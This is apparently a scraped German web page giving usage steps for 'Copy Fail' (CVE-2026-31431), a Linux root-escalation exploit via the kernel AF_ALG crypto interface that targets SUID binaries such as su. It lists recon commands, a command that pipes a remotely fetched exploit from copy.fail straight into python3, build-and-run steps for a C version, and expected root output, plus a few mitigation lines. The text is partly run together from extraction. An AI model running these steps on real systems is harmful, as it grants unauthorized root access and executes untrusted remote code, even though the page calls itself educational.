
Die meisten Linux-LPEs benötigen ein Race-Window oder einen kernelspezifischen Offset. Copy Fail ist ein geradliniger Logikfehler, er benötigt keines von beidem. Dasselbe 732-Byte-Python-Skript (oder .c-ELF) rootet jede Linux-Distribution, die seit 2017 ausgeliefert wurde.
Dieser Inhalt dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Führen Sie dies NICHT auf Systemen ohne ausdrückliche Genehmigung aus.
Copy Fail (CVE-2026-31431) ist eine Linux-Schwachstelle zur lokalen Rechteausweitung (LPE), die die Kernel-Crypto-API über AF_ALG betrifft.
Sie ermöglicht es einem nicht privilegierten Benutzer, Page-Cache-Daten einer SUID-Binärdatei (z. B. /usr/bin/su) zu überschreiben und Root-Zugriff zu erlangen.
AF_ALG aktiviertalgif_aead-Modul geladenos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Erwartete Indikatoren:
authencesn(hmac(sha256),cbc(aes))algif_aead geladenpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Erwartetes Ergebnis:
uid=0(root)
os.splice nicht gefundenUrsache:
Lösung:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Mögliche Ursachen:
Erforderliche Tools installieren:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
System aktualisieren:
apt update && apt upgrade
Wenn der Exploit fehlschlägt, ziehen Sie Folgendes in Betracht:
Verwenden Sie diesen Exploit verantwortungsvoll nur in Laboren, CTFs und autorisierten Penetrationstests.